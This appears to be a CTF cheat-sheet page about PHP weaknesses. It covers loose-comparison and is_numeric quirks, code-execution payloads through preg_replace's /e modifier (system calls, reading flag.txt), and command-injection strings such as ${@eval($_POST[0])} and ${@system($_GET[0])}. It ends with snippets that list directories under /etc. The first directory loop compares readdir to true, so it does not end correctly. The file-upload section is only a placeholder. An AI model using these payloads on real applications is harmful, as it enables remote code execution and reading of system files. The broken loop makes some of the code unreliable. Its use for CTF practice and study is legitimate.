PHP
PHP Code that could help in CTF
Information
Comparison
#Comparisons
var_dump(0 == "a"); // 0 == 0 -> true
var_dump("1" == "01"); // 1 == 1 -> true
var_dump("10" == "1e1"); // 10 == 10 -> true
var_dump(100 == "1e2"); // 100 == 100 -> true
var_dump(.0 == "00"); // 0 == 0
is_numeric()
is_numeric(" \t\r\n 123") => true
is_numeric(' 87') => true
is_numeric('87 ') => false
is_numeric(' 87 ') => false
is_numeric('0xdeadbeef')
# Returns True
' -.0'
'0.'
' +2.1e5'
' -1.5E+25'
'1.e5'
'9e9'
preg_replace
#Example1
preg_replace('/a/e', 'sYstEm(ls)', 'aaaa');
#Example2
preg_replace('/a/e', '$output = `cat flag.txt`; echo "<pre>$output</pre>";', 'aaaa');
#Example3
preg_replace('/a/e', 'sYstEm("ls")', 'aaaa');
File Upload Vulnerability
#Update Later
Command Injection
#POST
command=${@eval($_POST[0])}
- intercept request and send
* 0=ls
#GET
${@system($_GET[0])}&0=ls -la
system(ls)
Multiple Ways to Read Files/Directories
Opendir()
<?php
$dir = "/etc/";
// Open a known directory, and proceed to read its contents
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== true) {
echo "filename: $file : filetype: " . filetype($dir . $file) . "\n";
}
closedir($dh);
}
}
?>
Scandir()
<?php
$dir = '/etc';
$files1 = scandir($dir);
$files2 = scandir($dir, 1);
print_r($files1);
print_r($files2);
?>
Readdir()
<?php
if ($handle = opendir('/etc')) {
echo "Directory handle: $handle\n";
echo "Entries:\n";
/* This is the correct way to loop over the directory. */
while (false !== ($entry = readdir($handle))) {
echo "$entry\n";
}
/* This is the WRONG way to loop over the directory. */
while ($entry = readdir($handle)) {
echo "$entry\n";
}
closedir($handle);
}
Glob()
<?php
foreach (glob("/etc/*.txt") as $filename) {
echo "$filename size " . filesize($filename) . "\n";
}
?>
References
Last updated